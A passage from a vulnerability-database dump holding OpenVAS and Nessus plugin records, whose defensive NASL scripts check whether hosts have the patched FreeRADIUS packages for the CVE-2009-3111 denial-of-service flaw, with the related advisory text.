See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1451\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1451\nhttps://rhn.redhat.com/errata/RHSA-2009-1451.html\";\ntag_summary = \"The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.\";\n\n\n\nif(description)\n{\n script_id(66166);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1451 (freeradius)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:55:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. 
A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.", "modified": "2017-07-12T00:00:00", "published": "2009-09-21T00:00:00", "id": "OPENVAS:64905", "href": "http://plugins.openvas.org/nasl.php?oid=64905", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1451", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1451.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1451 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(64905);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1451\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1451.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-debuginfo\", rpm:\"freeradius-debuginfo~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "Check for the Version of freeradius", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880824", "href": "http://plugins.openvas.org/nasl.php?oid=880824", "type": 
"openvas", "title": "CentOS Update for freeradius CESA-2009:1451 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for freeradius CESA-2009:1451 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"FreeRADIUS is a high-performance and highly configurable free Remote\n Authentication Dial In User Service (RADIUS) server, designed to allow\n centralized authentication and authorization for a network.\n\n An input validation flaw was discovered in the way FreeRADIUS decoded\n specific RADIUS attributes from RADIUS packets. A remote attacker could use\n this flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\n RADIUS packet. (CVE-2009-3111)\n \n Users of FreeRADIUS are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. 
After installing the\n update, radiusd will be restarted automatically.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"freeradius on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\");\n script_id(880824);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2009:1451\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_name(\"CentOS Update for freeradius CESA-2009:1451 centos5 i386\");\n\n script_summary(\"Check for the Version of freeradius\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:32:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "description": "Check for the Version of freeradius", "modified": "2017-12-20T00:00:00", "published": "2010-01-15T00:00:00", "id": "OPENVAS:830798", "href": "http://plugins.openvas.org/nasl.php?oid=830798", "type": "openvas", "title": "Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in freeradius:\n\n The rad_decode function in FreeRADIUS before 1.1.8 allows remote\n attackers to cause a denial of service (radiusd crash) via zero-length\n Tunnel-Password attributes. NOTE: this is a regression error related\n to CVE-2003-0967 (CVE-2009-3111).\n \n This update provides a solution to this vulnerability.\n \n Update:\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\";\n\ntag_affected = \"freeradius on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00022.php\");\n script_id(830798);\n script_version(\"$Revision: 8186 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 07:30:34 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2009:227-1\");\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_name(\"Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of freeradius\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1\", rpm:\"libfreeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-devel\", rpm:\"libfreeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-krb5\", rpm:\"libfreeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-ldap\", rpm:\"libfreeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-mysql\", rpm:\"libfreeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-postgresql\", rpm:\"libfreeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-unixODBC\", rpm:\"libfreeradius1-unixODBC~1.1.7~2.1mdv2008.0\", 
rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1\", rpm:\"lib64freeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-devel\", rpm:\"lib64freeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-krb5\", rpm:\"lib64freeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-ldap\", rpm:\"lib64freeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-mysql\", rpm:\"lib64freeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-postgresql\", rpm:\"lib64freeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-unixODBC\", rpm:\"lib64freeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T11:52:17", "description": "A vulnerability has been found and corrected in freeradius :\n\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. 
NOTE: this is a regression error related\nto CVE-2003-0967 (CVE-2009-3111).\n\nThis update provides a solution to this vulnerability.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers.", "edition": 24, "published": "2010-01-12T00:00:00", "title": "Mandriva Linux Security Advisory : freeradius (MDVSA-2009:227-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2010-01-12T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64freeradius1-ldap", "p-cpe:/a:mandriva:linux:lib64freeradius1-devel", "p-cpe:/a:mandriva:linux:libfreeradius1", "p-cpe:/a:mandriva:linux:libfreeradius1-ldap", "p-cpe:/a:mandriva:linux:lib64freeradius1-krb5", "p-cpe:/a:mandriva:linux:lib64freeradius1", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:freeradius", "p-cpe:/a:mandriva:linux:lib64freeradius1-postgresql", "p-cpe:/a:mandriva:linux:lib64freeradius1-mysql", "p-cpe:/a:mandriva:linux:libfreeradius1-krb5", "p-cpe:/a:mandriva:linux:libfreeradius1-postgresql", "p-cpe:/a:mandriva:linux:libfreeradius1-devel", "p-cpe:/a:mandriva:linux:lib64freeradius1-unixODBC", "p-cpe:/a:mandriva:linux:libfreeradius1-unixODBC", "p-cpe:/a:mandriva:linux:libfreeradius1-mysql"], "id": "MANDRIVA_MDVSA-2009-227.NASL", "href": "https://www.tenable.com/plugins/nessus/43851", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:227. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43851);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3111\");\n script_xref(name:\"MDVSA\", value:\"2009:227-1\");\n\n script_name(english:\"Mandriva Linux Security Advisory : freeradius (MDVSA-2009:227-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in freeradius :\n\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. NOTE: this is a regression error related\nto CVE-2003-0967 (CVE-2009-3111).\n\nThis update provides a solution to this vulnerability.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-ldap\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 
get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"freeradius-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-devel-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-krb5-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-ldap-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-mysql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-postgresql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64freeradius1-unixODBC-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-devel-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-krb5-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-ldap-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-mysql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", 
reference:\"libfreeradius1-postgresql-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfreeradius1-unixODBC-1.1.7-2.1mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:07:03", "description": "Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
